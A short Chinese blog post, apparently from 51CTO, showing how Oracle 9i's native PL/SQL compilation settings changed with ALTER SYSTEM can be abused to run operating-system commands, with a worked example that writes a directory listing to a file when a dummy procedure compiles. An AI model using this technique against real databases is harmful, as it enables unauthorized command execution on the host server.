这里举出一个攻击代码例子,你也许会觉得惊奇,抑或认为这是一个运行命令的好办法,是的它很“有用”。
在Oracle 9i中允许采用Oracle本地编译PL/SQL应用程序的方式进行操作。显然,可以利用这一点来运行OS命令:
SQL> alter system set plsql_native_make_utility='cmd.exe /C dir >C:\oops.txt &';
SQL> alter system set plsql_native_make_file_name=' foo';
SQL> alter system set plsql_native_library_dir='bee';
系统已更改。
create or replace PROCEDURE wcg
IS
BEGIN
NULL;
END;
/
show errors
在Oracle编译wcg过程的时候,Oracle会执行下面的代码:
cmd.exe /C dir > C:\oops.txt -& -f foo
bee/RUN_CMD__SYSTEM__0.DLL
Oracle10g中 plsql_native_make_utility与plsql_native_make_file_name2个参数已被废弃。
使用ALTER SYSTEM运行OS命令
原创
©著作权归作者所有:来自51CTO博客作者maclean_007的原创作品,请联系作者获取转载授权,否则将追究法律责任
上一篇:菜式介绍:蕨根鹅肠
下一篇:菜式介绍:瓜姜鳜鱼丝
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
MySQL 给用户添加 ALTER VIEW 的权限
在某些情况下,需要为用户添加特定的权限,例如 ALTER VIEW 权限,以允许他们修改视图。
数据库 MySQL 数据 ALTER VIEW 视图 -
ALTER SYSTEM CHECK DATAFILES命令的使用
ALTER SYSTEM CHECK DATAFILES命令的使用
ALTER SYSTEM CHECK D rac 无法访问 oracle 搜索 -
alter system checkpoint
<br />checkpoint_clause<br /><br /><br />Specify CHECKPOINT to explicitly force Oracle Database to perform a checkpoint, ensuring that all changes made
system database transactions oracle application -
alter system flush shared_pool命令解析
alter system flush shared_pool命令解析
shared_pool ora-04031 客户端连接 sga
